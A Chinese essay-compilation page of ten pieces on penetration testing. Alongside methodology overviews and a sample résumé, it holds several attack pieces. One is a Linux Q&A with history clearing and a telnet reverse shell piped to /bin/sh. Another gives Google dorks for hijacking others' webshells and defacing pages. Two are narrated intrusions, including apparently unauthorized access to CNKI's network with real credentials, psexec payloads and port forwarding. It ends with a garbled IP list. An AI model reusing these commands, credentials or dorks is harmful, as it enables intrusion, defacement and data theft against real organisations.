当前位置：首页 > 范文大全 > 实用文>渗透测试的介绍

渗透测试的介绍

2023-06-01 08:31:04 收藏本文下载本文

“龙可乐”通过精心收集，向本站投稿了14篇渗透测试的介绍，下面是小编为大家整理后的渗透测试的介绍，如果喜欢可以分享给身边的朋友喔!

渗透测试的介绍

篇1：渗透测试的介绍

1 定义

渗透测试 (penetration test)并没有一个标准的定义，国外一些安全组织达成共识的通用说法是：渗透测试是通过模拟恶意的攻击方法，来评估计算机网络系统安全的一种评估方法，这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析，这个分析是从一个攻击者可能存在的位置来进行的，并且从这个位置有条件主动利用安全漏洞。

我们认为渗透测试还具有的两个显著特点是：渗透测试是一个渐进的并且逐步深入的过程。渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。

2 渗透测试是安全评估的方法之一

安全评估通常包括工具评估、人工评估、顾问访谈、问卷调查、应用评估、管理评估、网络架构评估、渗透测试等

渗透测试与其他评估方法的区别：通常评估方法是根据已知信息资产或其他被评估对象，去发现所有相关的安全问题。渗透测试是根据已知可利用的安全漏洞，去发现是否存在相应的信息资产，通常评估方法对评估结果更具有全面性，渗透测试则更注重安全漏洞的严重性。

渗透测试一方面可以从攻击者的角度，检验业务系统的安全防护措施是否有效，各项安全策略是否得到贯彻落实；另一方面可以将潜在的安全风险以真实事件的方式凸现出来，从而有助于提高相关人员对安全问题的认识水平。渗透测试结束后，立即进行安全加固，解决测试发现的安全问题，从而有效地防止真实安全事件的发生。

3 凸现最严重的安全问题

安全评估通常会发现许多安全问题，而通过渗透测试这种“真实的” 事件，能从中找出最急需解决的部分

4 白盒子(White Box)

已经获取了尽可能多的各种信息

通常包括从组织外部和从组织内部两种地点进行渗透测试

黑盒子(Black Box)

除了被测试目标的已知公开信息外，不提供任何其他信息

通常只从组织的外部进行渗透测试

灰盒子(Gray Box)

介于以上两者之间

5 信息收集、分析

制订渗透方案并实施

前段信息汇总、分析

提升权限、内部渗透

渗透结果总结

输出渗透测试报告

提出安全解决建议

6 客户提供

该部分主要来源于客户所提供的一些实际网络结构，安全等级制度等一系列的已有安全体制。

工具扫描

该部分主要利用一系列现有的安全产品或工具对目标网络进行全方位的安全扫描，其中包括服务，端口等其他，使用的工具包括：Nessus Scanner、Nmap、SnmpScanner等。

智能判断

利用工程师积累的渗透测试以及其他安全经验，对目标主机进行信息收集和分析。

本地扫描

为了能更好的渗透其网络的安全性，在客户允许的范围内对本地进行实地扫描，

通过短时间的模拟攻击扫描结合客户提供的详细情况，迅速寻找出目标网络中的薄弱环节，保证了制定的渗透测试方案的整体效率。

建立信息池

汇总以上各方面的信息，建立信息池

7 渗透方案制订考虑因素

网络规模

业务组成

网络分布

其他因素

渗透方案内容

目标、范围

计划

流程

风险规避

保密 8 验证信息池内容

试探、获取权限

根据具体信息相应实施过程调整

9 信息综合、汇总

分析、归类、筛选、整理

信息池更新

确定渗透实施重点

制定下一步实施方案

10 纵向权限提升

读权限提升为写权限

应用系统权限提升为操作系统权限

普通用户权限提升为管理员权限

横向权限提升

通过本地权限获取远程主机权限

获取本地局域网、设备等访问权限

获取远程网络、设备的访问权限

递归操作

在需要的情况下，从第一阶段重新进行

11 渗透成果汇总

重大安全问题及时告知客户

成功、失败的经验总结

清除渗透过程中间文件

12 渗透测试成果汇报、交流

渗透过程

渗透深度（纵向、横向）

渗透结果

正式渗透测试报告

综合方案、过程、成果汇报

保密

文挡移交、销毁

信息池移交、销毁

渗透成果保密

13 备份系统

紧急响应小组

禁止高危操作

操作过程记录

中间文件处理

“收尾”工作处理

14 扫描

工具扫描：漏洞、端口、帐户穷举

人工试探：系统版本、应用服务信息、网络信息

本地权限

口令猜测

远程漏洞、应用漏洞

。。。

权限提升

本地溢出、进程注入

事件触发

。。。

关联攻击

网络嗅探、会话劫持、中间人攻击

篇2：渗透测试方法介绍

1 定义8de1831be7ZmQy9Z

2 渗透测试是安全评估的方法之一

安全评估通常包括工具评估、人工评估、顾问访谈、问卷调查、应用评估、管理评估、网络架构评估、渗透测试等

3 凸现最严重的安全问题

安全评估通常会发现许多安全问题，而通过渗透测试这种“真实的” 事件，能从中找出最急需解决的部分

4 白盒子

已经获取了尽可能多的各种信息

通常包括从组织外部和从组织内部两种地点进行渗透测试

黑盒子

除了被测试目标的已知公开信息外，不提供任何其他信息

通常只从组织的外部进行渗透测试

灰盒子

介于以上两者之间

5 信息收集、分析

制订渗透方案并实施

前段信息汇总、分析

提升权限、内部渗透

渗透结果总结

输出渗透测试报告

提出安全解决建议

6 客户提供

该部分主要来源于客户所提供的一些实际网络结构，安全等级制度等一系列的已有安全体制，

工具扫描

智能判断

利用工程师积累的渗透测试以及其他安全经验，对目标主机进行信息收集和分析。

本地扫描

为了能更好的渗透其网络的安全性，在客户允许的范围内对本地进行实地扫描。通过短时间的模拟攻击扫描结合客户提供的详细情况，迅速寻找出目标网络中的薄弱环节，保证了制定的渗透测试方案的整体效率。

建立信息池

汇总以上各方面的信息，建立信息池

7 渗透方案制订考虑因素

网络规模

业务组成

网络分布

其他因素

渗透方案内容

目标、范围

计划

流程

风险规避

保密

8 验证信息池内容

试探、获取权限

根据具体信息相应实施过程调整

9 信息综合、汇总

分析、归类、筛选、整理

信息池更新

确定渗透实施重点

制定下一步实施方案

10 纵向权限提升

读权限提升为写权限

应用系统权限提升为操作系统权限

普通用户权限提升为管理员权限

横向权限提升

通过本地权限获

篇3：渗透测试简历

渗透测试简历模板

渗透测试 (penetration test)并没有一个标准的定义，国外一些安全组织达成共识的通用说法是：渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法,下面就是渗透测试简历模板。

渗透测试简历模板

袁XX

两年以上工作经验|男|28岁（1988年10月25日）

居住地：北京

电话：131********（手机）

E-mail：yuanyuhua@ www.jianlimoban.net

最近工作[1年2个月]

公司：XX有限公司

行业：金融/投资/证券

职位：渗透测试员

最高学历

学历：本科

专业：信息安全

学校：北京信息科技大学

自我评价

售前技术支持，可为公司负责前期工作，包括与用户沟通交流，收集、分析用户需求，为用户提供解决方案；向研发人员反馈用户的需求、并协助公司研发人员产品开发；协助市场人员引导用户进行技术、业务的选择；负责组织起草满足用户要求的`技术、系统方案的编写，负责与用户的技术交流工作。

求职意向

到岗时间：随时到岗

工作性质：全职

希望行业：金融/投资/证券

目标地点：北京

期望月薪：面议/月

目标职能：渗透测试员

工作经验

20xx/3 — 20xx/5：XX有限公司[1年2个月]

所属行业：金融/投资/证券

开发部渗透测试员

1.等级保护测评，参与被测系统各安全层面检测及报告编写工作；

2.非金融机构支付业务设施检测，参与被测系统各层面检测工作；

3.渗透测试，负责对客户应用系统进行外网或内网渗透测试。

20xx/5 — 20xx/1：XX有限公司[1年8个月]

所属行业：金融/投资/证券

开发部渗透测试员

1.手机APP安全检测，负责对Android和ios手机客户端进行安全检测。

2.风险评估、电子银行信息安全评估，参与被测系统各安全层面检测工作。

教育经历

20xx/9— 20xx/6北京信息科技大学信息安全本科

证书

20xx/6大学英语四级

语言能力

英语（良好）听说（良好），读写（良好）

篇4：如何执行一个渗透测试

一个良好的渗透测试是什么组成的？

虽然执行一个渗透测试有许多明显的优点――执行渗透测试的价值在于它的结果，这些结果必须是有价值的，而且对于客户来说必须是很容易理解的。有一个常见的误解是认为渗透测试只是使用一些时髦的自动化安全工具，并处理所生成的报告。但是，成功执行一个浸透测试并不仅仅是需要安全工具。虽然这些自动化安全测试工具在实践中扮演了重要的角色，但是它们也是有缺点的。事实上，这些工具一直无法真正模拟一个高深攻击者的行为。不管安全工具完成的报告有多么全面，其中总是有一些需要解释的问题。

让我们看看构成一个良好渗透测试的一些关键因素：

•建立参数：定义工作范围是执行一个成功渗透测试的第一步，也是最重要的一步。这包括定义边界、目标和过程验证（成功条件）。

•专业人员：配备技术熟练和经验丰富的咨询人员执行测试――他们了解自己要做什么。换句话说，专业人员与一般人员是不同的。要保证他们是：

o 能胜任的

o经验丰富的

o遵守保密协议

•选择足够的测试集：手工的和自动的都会影响成功/效益之间的最佳平衡。

•遵循正确的方法：这并不是猜谜游戏。所有方面都需要规划、文档化和符合要求。

•结果值：结果应该详细地写入文档，并且要尽力使它们能被客户所理解。不管是技术报告还是执行总结，都需要一些注释。应用安排一些安全咨询人员/测试人员来回复问题或解释结果。

•测试结果与建议：这是渗透测试的一个非常重要的部分。最终的报告必须清晰地说明成果，必须将成果与潜在的风险对应。这应该会附带产生一个基于最佳安全实践方法的修正路线图。

在我们讨论浸透测试中所使用的测试策略和技术之前，让我们先看一些可能很有用的场景：

•建立新的办公室

不管是建立新的公司或增加新的办公点，浸透测试都有助于确定网络基础架构中的潜在漏洞，

例如，在增加新办公点时执行内部测试是非常重要的，因为它会检查网络资源的可用性，并检查这些办公点之间传输的流量类型。

•部署新的网络基础架构

每一个新的网络基础架构都应该能模拟行为进行全面的测试。当执行外部测试（预先不太了解基础架构）来保证边界安全性时，我们也应该执行内部测试来保证网络资源，如：服务器、存储、路由和访问设备，在边界受到攻击时仍然是足够安全的，而且基础架构是能够抗拒任何攻击的。

•修改/升级现有的基础架构

修改是不可避免的――可能是软件、硬件或网络设计，由于需要功能改进；修复重大缺陷和/或应用新的需求，都可能引起修改/升级。不管现有的基础架构在什么时候发生变化，它都应该再次测试，以保证不会出现新的漏洞。必要测试的数量取决于基础架构修改的特征和程度。细小的变化，如配置变更为特定规则，将只需要进行端口扫描来保证预期的防火墙行为，而重大的变化，如关键设备/OS版本升级，可能就需要彻底重新测试。

•部署新应用

当基础架构进行彻底测试之后，新的应用（不管是连接Internet的或是在Intranet中）在部署到生产环境之前也都必须进行安全性测试。这个测试需要在“实际的”平台上进行，以保证这个应用只使用预定义的端口，而且代码本身也是安全的。

•修改/升级一个现有应用

随着基本架构发生变化，本质上应用也会发生变化。细小的变化，如用户帐号修改，都不需要测试。但是，重大的变化，包括应用功能变化，都应该彻底重新测试。

•定期重复测试

管理安全性并非易事，而公司不应该认为渗透测试就是所有安全问题的最终解决办法。如果这样认为，那么他们只是相信了假的安全性。对敏感系统定期执行测试来保证不会出现不按计划的变化，一直都是一个非常好的实践方法

篇5：经典的Linux渗透测试问题

此攻略中的题目收集于Wooyun zone，每道题其实都有一些不同的解法，且本套题中有不少题的题目写的不是很清晰，容易产生误解，本题解仅作抛砖引玉，希望有其他解答方案的同学可以留言共同探讨。

1、登录系统如何不让记录历史操作命令?

1.修改/etc/profile文件将HISTSIZE = 1000为0或1 # 91ri.org注：HISTSIZE 是环境变量中用于设置可以保存的历史命令条数，设置为0便不会保存。小编首次见到此题目是在wooyun zone 但zone上面的回答都是下面的2，3两种方案，实际上最符合题意的应该是修改环境变量这种。

2.或者清除用户主目录路径下， bash_history

3.立即清空历史命令的历史记录

history -c

4.bash执行的命令不是立即命令名称写入到历史文件中，而是存储在内部缓冲区，因此也将等bash退出时一并写入。

但是，你可以调用的历史w’的命令bash立即更新历史文件。

history -w

2、ssh 限制了ip登录，要求ssh登录，如何处理?

如果确认被过滤了，并且你有一个shell的话，可以先在这个机器里跑个lhtran.c做一个 socks proxy，如果端口都被过滤了，就再用一次lhtran回连一个socks proxy，这个时候你可以试试用这个代理登录他的ssh,如果好运的话(allow里写了本机的地址)，你可以进入系统。

#91ri.org注：wooyun上有人说可以使用iptable转发端口突破，似乎如果只有个user的shell，不能操作iptable吧。也许小编知识水平不够高，不知各位读者有什么想法?欢迎留言讨论，这个问题出的不是很严谨，应该有其他方法。

3、在ssh后门里看不到对方是否登录的情况下，用哪个命令可以准确显示出来?

可以尝试通过linux下的w和who命令来查看。

关于w和who命令的用法可参考《Linux中W与Who命令的使用》

4、如何获取真正的tty

解决这道题我们要先知道两个前置知识，tty与console有什么区别：

1. console是输出设备，tty是字符设备

2. console是虚拟设备，映射到真正tty上面

不过这题作者似乎写的不是很明白，小编按题意给出个人理解，大家自行参考，

解法1：

[test@localhost ~]$ tty/dev/tty2

解法2(wooyun@坏虾)：

python -c 'import pty; pty.spawn(“/bin/sh”)'

解法3：

[test@localhost ~]$ who5、如何使用telnet进行反向连接

这道题可难为我们团队的同学了，网上的资料说这个无法实现，而且题目感觉写的不清晰，我们做了2天才解决这个问题。

telnet反向连接在实战中的作用：

案例1：试图获取某工业级数据包检测防火墙或者路由器之后(基于路由的防火墙，不代理任何服务)的一台UNIX的系统的WEB服务器的访问权。防火墙仅对外网开放了80及443，这台WEB服务器存在phf漏洞(phf漏洞是什么自行脑补)，可远程对该web服务器执行命令。此时就可以通过unix自带的telnet获取到一个交互式的SHELL。(91ri.org补充：因为之所以不用NC是因为服务器一般都有安装telnet，且很少受到限制。而connect又是从目标主机中发起，所以可以达到穿透防火墙及内网的作用。)

环境假设：

target ip : 192.168.128.105

hacker ip：192.168.128.100

telnet 反向连接命令：

target ：

/usr/bin/telnet 192.168.128.100 80 |/bin/sh |/usr/bin/telnet 192.168.128.100

hacker：

/opt/netcat/bin/nc -l -n -v -p 80/opt/netcat/bin/nc -l -n -v -p 25

命令说明：实际上我们是将telnet连接到hacker的80端口的NC上，为了与传统的unix的输入输出机制保持一致，我们通过标准输出即键盘通过管道输给了Bourne shell。而由/bin/sh 执行命令的结果再通过管道输出telnet，并返回到hacker的25端口的NC上。

之所以选择80和25是因为大多数防火墙都允许它们向外访问，假如没有防火墙，那么选什么端口都可以。

篇6：记一个简单的渗透测试过程

PS：本人技术很菜，大牛莫怪

朋友发来的一个站，让我帮忙看看，用了一上午时间把主站搞定了，可是主站是提不了权LINUX，而且内网90%都是WINDOWS的服务器，拿LINUX搞WINDOWS各种不爽，况且还是个低权限的，NMAP的各种参数都用不了。又从外网看了下C段，除了主站外对外开了三个WEB服务，俩静态的放弃了，就剩一个2K3+IIS+ASP的站。就他了！

操起各种SCANNER一顿扫，没注入点，找到了后台路径。惆怅了！发现了一个能和管理员留言的地方，于是乎猥琐流XSS盲打后台。管理员也很不负责，M天之后他才登陆。进了后台，发现管理员的密码居然是123456，真想狠狠的抽自己个嘴巴，然后再把手剁了！

进了后台发现了一处上传图片，未果，放弃。又四处逛逛，发现有个上传档案的地方，应该能上传webshell（如图1）。上传了个ASP文件成功了，点了下后台的下载链接居然直接下载了，找不到上传路径。抓包看了下，也不行。

我突然对这个上传产生了一点自己的看法，那就是：MLGB！！

没办法，想着在后台找个注入点读数据，把写在数据库里download的路径读出来，

有的被过滤了，有的加引号报错（图2），MYSQL4的数据库，UNION查询9个字段，但是提示类型不正确CINT，应该是ASP代码里强制加了类型转换。

继续在后台找别的注入点，发现了能正常UNION查询的，搞之。MYSQL4的数据库果断LOAD_FILE。先读IIS的配置文件C:\WINDOWS\system32\inetsrv\MetaBase.xml，得到网站根目录。之后load_file数据库连接文件，在之前的LINUX的SHELL里连，怎么都连不上，纳闷了。猜数据库的表和列，猜到表了，但是死活猜不出保存上传存储路径的列。

没办法，读download.asp，的文件得到如图3.

分析下代码，请注意

strAbsFile = Server.MapPath(“.”) & “\file\” & strSNO & trim(rs(“”))

这句。

原来上传的文件保存规则是网站根路径\file\上传文件的ID.后缀。

这样问题就解决了！嗯哼，成功拿到webshell，然后就开始各种猥琐的内网渗透，就不写了。。

因为是上班时间，行文比较流水，请大家见谅。

最后总结一下全文：是中国的！

篇7：网络渗透测试的五个阶段

网络渗透测试分以下描述的五个阶段

（1）.侦察在这个阶段测试人员主要收集目标尽可能多的信息，其侦察形式也分为两种，一是主动模式，测试人员可以使用nslookup、dig等工具进行探测目标网络确定IP地址范围等；二是被动模式，利用新闻组或者招聘等信息来发现有关公司技术的信息

（2）.扫描大多数会使用nmap这样的工具来进行扫描获取器开放的端口，以及确定目标主机上运行的服务，

网络渗透测试的五个阶段

，

也是这个阶段来确定目标操作系统的指纹识别，确定其运行的操作系统。扫描的工作也包括了漏洞扫描，因为漏洞测试也是获取主机访问的方法之一

（3）.获取访问通过前期获取的信息进行获取访问，可以通过web、数据库、系统漏洞等多方面漏洞进行测试获取目标主机的访问权限

（4）.维持访问在获得了访问权限后需要进行一个长期的维持阶段，这个时候我们需要后门木马程序安装，以便于我们长期的重复进入目标系统来进行访问

（5）.擦除证据在此前我们需要获得这个授权，如果测试者不能证明他们进行了日志擦除，那么擦除的文件就会导致责任问题，所以我们需要向客户了解这个时候需要进行操作

篇8：用google来进行渗透测试

我们今天渗透测试人员在实施攻击之前，往往会先进行信息搜集工作，而后才是漏洞确认和最终的漏洞利用、扩大战果，在这里我们现在要谈的是：

一、利用google查找被人安装了php webshell后门的主机，并测试能否使用;

二、利用google查找暴露出来的INC敏感信息.

OK，现在我们开始：

1.查找利用php webshell

我们在google的搜索框中填入：

Code:

intitle:“php shell*” “Enable stderr” filetype:php

(注: intitle―网页标题 Enable stderr―UNIX标准输出和标准错误的缩写filetype―文件类型)。搜索结果中，你能找到很多直接在机器上执行命令的web shell来。如果找到的PHPSHELL不会利用,如果你不熟悉UNIX,可以直接看看LIST,这里就不详细说了,有很多利用价值。要说明的是,我们这里搜索出来的一些国外的PHPSHELL上都要使用UNIX命令,都是system调用出来的函数(其实用百度及其他搜索引擎都可以,只是填写搜索的内容不同)。通过我的检测,这个PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句话就把首页搞定了:

Code:

echo “召唤” >index.jsp

在得到的

Code:

echo

后再写上:“召唤”

现在看看首页,已经被我们改成: “召唤” 了

我们也可以用WGET上传一个文件上去(比如你要替换的叶子吧)。然后execute Command输入 cat file >index.html or echo “” >file

echo “test” >>file

这样一条条打出来,站点首页就成功被替换了。同样的也可以

Code:

uname -a;cat /etc/passwd

不过有点要注意,有些WEBSHELL程序有问题，执行不了的，比如:

www.al3toof.com/card/smal ... c_html&command=

ramsgaard.net/upload/shell.php

这些站的php是global register off

解决方案:

我们可以利用相关工具进行在互联网进行搜索，如果有信息被滥用，到www.google.com/remove.html 提交你希望删除的信息,

控制搜索引擎机器人的查询.

2.搜索INC敏感信息

我们在google的搜索框中填入:

Code:

.org filetype:inc

我们现在搜索的是org域名的站点的INC信息(因为google屏蔽掉了搜索“COM”信息,我们还可以搜其他gov,cn,info,tw,jp,edu等等之类的)

PS:我在看许多PHP编程人员在编程时候，都喜欢把一些常写的代码或配置信息，写在一个.inc的文件中，如shared.inc、global.inc、conn.inc等等，当然这是一个很好的习惯，包括PHP 都是如此，但不知你有没有注意到这里面含一个安全隐患问题。

我有一次在写一个PHP代码时，无意中写错了一句话，当我在浏览器里查看此PHP文件时，竟然发现屏幕详细的显示了我所出错的PHP文件路径及代码行，

(PHP错误显示配置是开着的.此功能在PHP里是默认的!)，这就是说当我们无意写错代码(同样.inc文件也一样) 或者PHP代码解析出问题时，而PHP错误显示又是开着的,客户端的用户就会看到具体url地址的.inc文件。

而.url文件如同txt文本一样,当在浏览器中浏览时,就毫无保留地显示了它的内容，而且不少站点在.inc文件写了重要的信息如用户密码之类!包括国内著名海尔公司以及嘉铃摩托公司,我之所以敢公布是因为我本人测试过,www.haier.com/su ***/inc/conn.inc 暴出的数据库ID密码用客户端连不上去,网站关闭了1215,而且防火墙也过滤掉了。

好,INC的知识说完后,我们继续又搜索到了好多,找到一个暴露了MYSQL口令的

我们又可以用客户端登陆上去修改数据了.这里涉及到数据库的知识,我们不谈太多,关于“INC暴露敏感信息”就到这里结束吧

当然我们可以通过一些办法解决：

1,你可以专门对.inc文件进行配置，避免用户直接获取源文件。

2,当然比较好的方法是，加上并且改文件扩展名为.php（PHP可以解析的扩展名）,这样客户端就不会获取源文件了。

这里,我将FreeMind绘制的图片用文本表示了.

有关Google Hack的详细信息,帮助我们分析踩点

连接符:

Code:

+ - : . * |

操作符:

Code:

“foo1 foo2”

filetype:123

site:foo.com

intext:foo

intitle:footitle

allinurl:foo

密码相关

Code:

：“index of”

htpasswd / passwd

filetype:xls username password email

“ws_ftp.log”

“config.php”

allinurl:admin mdb

service filetype:pwd (frontpage)

敏感信息：

Code:

“robots.tx”

“disallow:”

filetype:txt

inurl:_vti_cnf (frontpage files)

allinurl:/msadc/samples/selector/showcode.asp

allinurl:/examples/jsp/snp/snoop.jsp

allinurl:phpsysinfo

ipsec filetype:conf

intitle:“error occurred” odbc request where (select|insert)

“mydomain.com” nessus report

“report generated by”

结尾:

如果要拿ROOT权限就要具体问题具体分析了,不过有了SHELL权限就好提了,网上有很多根据WEBSHELL提升权限的文章大家可以参照一下。

篇9：记一次完整的WEB服务器渗透测试

渗透测试是最能直接的反映系统的安全性的一种手段了，

记一次完整的WEB服务器渗透测试

，

现整理了前段时间进行的一次渗透测试的笔记，整个过程中所使用的工具和思路都比较简单，本文也正是为了您的系统不被这些简单的东西所击败而作此次渗透测试的已知条件只有一个：目标IP地址211.***.***.11

篇10：针对知网CNKI一次简单的渗透测试

一个由外网渗透到CNKI内网的过程，因六月有更重要的事情要做，渗透到此为止，已知会忽略，提交权当笔记。^_^

一个由外网渗透到CNKI内网和获取敏感数据的过程。

整个渗透过程大致分为四部分：

一、弱点刺探：打开通向内网之门

一次偶然的机会接触到了CNKI的“大学生论文管理系统”，发现了这个系统的一个注入点。一切从这里开始……

xynu.check.cnki.net/ 用户名为学号，密码为身份证后8位，通过信息搜集获取到了一堆账号，登录一个测试：学号：5151013 密码：12027623

很幸运的是这个注入点数据库账户为DBA、支持多行执行，且可以使用xp_cmdshell/mssqlagent执行命令。

然而非常不幸的是虽然可以执行系统命令，但是经过一番测试，发现服务器不能连接外网，且站库已分离对外网不开放端口。那么要实际控制这台服务器就变的非常困难了，总不能每次都使用这个注入点去做事情。经过考虑，决定从其它方面着手。于是先使用两条语句添加了个sa权限账户备用：

exec master.dbo.sp_addlogin name,passexec master.dbo.sp_addsrvrolemember name,sysadmin

为了缩短渗透时间，就先Google一下看看有没有一些已知漏洞可以方便快速的打入CNKI内网：

经过筛选，找到了两个Struts2命令执行的站点：esafety.cnki.net和www.dangshi.cnki.net:8080，成功上传Webshell后以备后用。

从IP地址可以看到，服务器也处于CNKI的内网中。使用net view命令获取到了工作组中的所有计算机名：

经过比对得知计算机名是和IP对应的，比如IP为10.1.80.201，计算机名就为CNKI-1-80-201。这对下一步的渗透起了很大的作用。

esafety.cnki.net只开放了80端口，而www.dangshi.cnki.net开放了80和8080端口。因为这两个服务器也无法连接外网，所以不能使用reverse_tcp来反弹meterpreter，只能考虑使用bind_tcp的方式。

经过考虑，决定停掉www.dangshi.cnki.net的一个服务80/8080端口来做为bind_Tcp的端口。于是使用Webshell执行iisreset /stop命令来停掉IIS，但结果却出乎意料。IIS并未停止，反而工作于8080端口的Apache却Duang了……因为CNKI内网各服务器之间并未限制各个端口的通迅，所以在esafety.cnki.net上执行以下两条命令来获取www.dangshi.cnki.net(内网IP:10.1.93.14已抓取管理的登录密码)bind_tcp的Meterpreter(已上传PsExec和Bind_Tcp payload到esafety.cnki.net的D:\bak\目录)：

psexec -accepteulapsexec \\10.1.93.14 -u Administrator -p 抓到的密码 -c D:\bak\bind.exe -d

连接211.151.247.54（www.dangshi.cnki.net外网IP）的8080端口，成功获取到了Meterpreter。至此内网的大门已经洞开。（后面的一些截图并非是第一时间的；只是为了说明问题和原理后补上来的，所以有一些误差，请不要在意！）

二、内网初探：扫描弱口令、攻击弱点服务、扩大信息收集面

1、构建可快速连接的内网渗透环境

使用Meterpreter和portfwd命令可以方便地转发内网端口到本地：

portfwd add -l 4444 -p 3389 -r 127.0.0.1portfwd add -l 3333 -p 3389 -r 10.1.201.84 (这个是esafety.cnki.net的内网IP)

在10.1.93.14的IIS管理器中发现服务器上还运行着其它站点，于是找一个留下Webshell。这样就不用在10.1.201.84使用psexec来运行bind_tcp payload了，且上传文件会方便很多。

2、扫描一些包含弱口令的服务

由于我使用的网络不稳定且Meterpreter扫描一些服务的弱口令较慢，所以部分扫描任务直接放到了内网服务器上去完成。

可以看到这个网段服务器大部分使用的是IIS，那么扫描一下MSSQL弱口令会如何呢？

下面这个截图：10.1.202.10是之前存在注入点的那个数据服务器，入内网之后轻易便拿到了管理权（数据库中有不少高校老师和学生的信息哦）。上面的Kbase企业管理器连接着同网段的几台数据服务器（密码为空），内含信息没有去查看。

篇幅有限，其它网段同样的扫描就不截图说明了。经过前期简单的扫描，大致获取到了以下几台主机的管理权（仅扫描了10.1.201.0/24和10.1.202.0/24）：

从已获得权限的几台服务器的管理密码上能解读什么信息呢？①.可以看到，Administrator的密码都为9位，非常复杂且毫无规律。可以猜测服务器密码一定有一个统一的管理或是分派到各管理员/部门管理，当然也有可能服务器上安装有管理类的软件来负责密码的统一管理工作。这里仅仅是猜想。②.CNKI内网似乎已有人扫描过了，可以看到不同段MSSQL弱口令的服务器已被添加了aa账号（经过辨明这不是管理添加的）。

三、交叉口令验证：通过已有账号信息获取其它服务器管理权

通过下图可以解析交叉口令的验证原理（仅仅一个方面）：

通过MSF使用已获得的账号密码信息来对整个网段进行检测：

交叉口令的来源很多，包含已有任何服务的口令。数据库口令、服务器登录口令、FTP口令、远程控制类软件口令（VNC、TeamViewer、Radmin、pcanywhere、向日葵等），其它服务类软件口令等。

验证账号：MI_Viewer 密码：MIOrchid#1 这组账号密码应该是某软件创建的。

交叉验证的工作模式：

四、总结过程查缺补漏

在整个渗透过程中总结是不可少的。成功目标的多少和信息收集的多少成正比。总结整个过程如下：

1、在整个过程中仅仅对10.1.201.0/24和10.1.201.0/24这两个子网做了检测，如果扩大攻击范围是不是可以获取更多服务器的权限？

2、在整个过程中仅仅针对MSSQL、Windows口令做了扫描，如果将扫描对象扩大到每个已知服务是不是可以收获更多？（已发现数个服务器安装了Serv-u、pcanywhere等软件）

3、一些专用软件了解不够，是不是要花些时间也对这些软件加以了解？（数个服务器安装了Kbase且为空口令，对这总数据库不了解就少了一条路）

4、一些备份服务器上留有某些站点的源码，是否应该花些时间来对这些代码做一次审计以便获取现在提供服务的服务器的权限？

5、通过查看某几个服务器的日志，发现有一个共同的IP登录过，是管理吗？知道了管理IP能干些什么呢？

6、内网的一些服务器，发现安全漏洞的机率是不是更高些呢？

附：net view后整理IP如下：

10.0.93.10410.1.0.1010.1.10.110.1.10.1010.1.10.10010.1.10.10110.1.10.10310.1.10.10410.1.10.10510.1.10.10610.1.10.10710.1.10.10810.1.10.10910.1.10.1110.1.10.11010.1.10.11110.1.10.11210.1.10.11310.1.10.11410.1.10.11510.1.10.11610.1.10.11710.1.10.11810.1.10.11910.1.10.1.1.10.12110.1.10.12210.1.10.12310.1.10.12410.1.10.12510.1.10.12610.1.10.12710.1.10.12810.1.10.12910.1.10.1310.1.10.13010.1.10.13210.1.10.13310.1.10.13410.1.10.13610.1.10.13710.1.10.13810.1.10.13910.1.10.1410.1.10.14010.1.10.14110.1.10.14210.1.10.14510.1.10.19810.1.10.210.1.10.2110.1.10.23810.1.10.2810.1.10.310.1.10.3110.1.10.3310.1.10.3510.1.10.3610.1.10.3710.1.10.3910.1.10.410.1.10.4410.1.10.510.1.10.5110.1.10.5310.1.10.5410.1.10.5610.1.10.5710.1.10.5810.1.10.610.1.10.6010.1.10.6110.1.10.6210.1.10.6310.1.10.6510.1.10.6610.1.10.6710.1.10.6810.1.10.710.1.10.7210.1.10.7410.1.10.7610.1.10.7810.1.10.810.1.10.8010.1.10.8210.1.10.8310.1.10.8410.1.10.8510.1.10.8610.1.10.8710.1.10.8810.1.10.8910.1.10.910.1.10.9010.1.10.9110.1.10.9210.1.10.9610.1.10.9710.1.10.9910.1.11.1010.1.11.1210.1.11.2010.1.11.20110.1.11.0.1.11.2110.1.11.2210.1.11.2310.1.11.2410.1.11.2510.1.11.2610.1.11.2710.1.11.2810.1.11.2910.1.11.3010.1.11.3110.1.110.110.1.110.1010.1.110.10010.1.110.1110.1.110.13410.1.110.1710.1.110.1810.1.110.1910.1.110.2010.1.110.20110.1.110.20210.1.110.20310.1.110.20410.1.110.20510.1.110.20610.1.110.20710.1.110.20810.1.110.20910.1.110.21010.1.110.21110.1.110.21210.1.110.21310.1.110.21410.1.110.21510.1.110.21610.1.110.21710.1.110.21810.1.110.21910.1.110.22010.1.110.22110.1.110.22210.1.110.22310.1.110.22410.1.110.22510.1.110.22610.1.110.2410.1.110.2810.1.110.3810.1.110.3910.1.110.5910.1.110.6110.1.110.6210.1.110.6310.1.110.6410.1.110.6510.1.110.6710.1.110.6810.1.110.6910.1.110.7010.1.110.7110.1.110.7210.1.110.7310.1.110.7410.1.110.8010.1.111.00910.1.111.110.1.111.10010.1.111.10110.1.111.10210.1.111.10310.1.111.10410.1.111.10510.1.111.10810.1.111.11310.1.111.210.1.111.2610.1.111.2710.1.111.2810.1.111.2910.1.111.310.1.111.3010.1.111.3110.1.111.410.1.111.510.1.111.5110.1.111.5210.1.111.5410.1.111.5910.1.111.6110.1.111.6210.1.111.810.1.111.9810.1.112.110.1.112.1010.1.112.1110.1.112.1210.1.112.1310.1.112.1410.1.112.1510.1.112.1610.1.112.1710.1.112.1810.1.112.1910.1.112.310.1.12.1110.1.12.1210.1.12.1310.1.12.1510.1.12.1810.1.12.1910.1.12.2010.1.12.2210.1.12.2310.1.12.2410.1.12.2510.1.12.2610.1.12.2810.1.12.2910.1.12.310.1.12.3010.1.12.3110.1.12.3210.1.12.3410.1.12.3510.1.12.3710.1.12.3810.1.12.3910.1.12.410.1.12.4010.1.12.510.1.12.5110.1.12.5210.1.12.5310.1.12.5410.1.12.610.1.12.710.1.12.810.1.12.910.1.120.12410.1.120.15110.1.120.18010.1.120.18210.1.120.18310.1.120.20110.1.120.20210.1.120.20310.1.120.20410.1.120.20510.1.120.20610.1.120.20710.1.120.20810.1.120.20910.1.120.21010.1.120.21110.1.120.21210.1.120.21310.1.120.21410.1.120.21510.1.120.21610.1.120.21710.1.120.21810.1.120.21910.1.120.22010.1.120.22110.1.120.22210.1.120.22710.1.120.22810.1.120.23810.1.120.24010.1.120.25110.1.121.1910.1.121.8110.1.121.9410.1.122.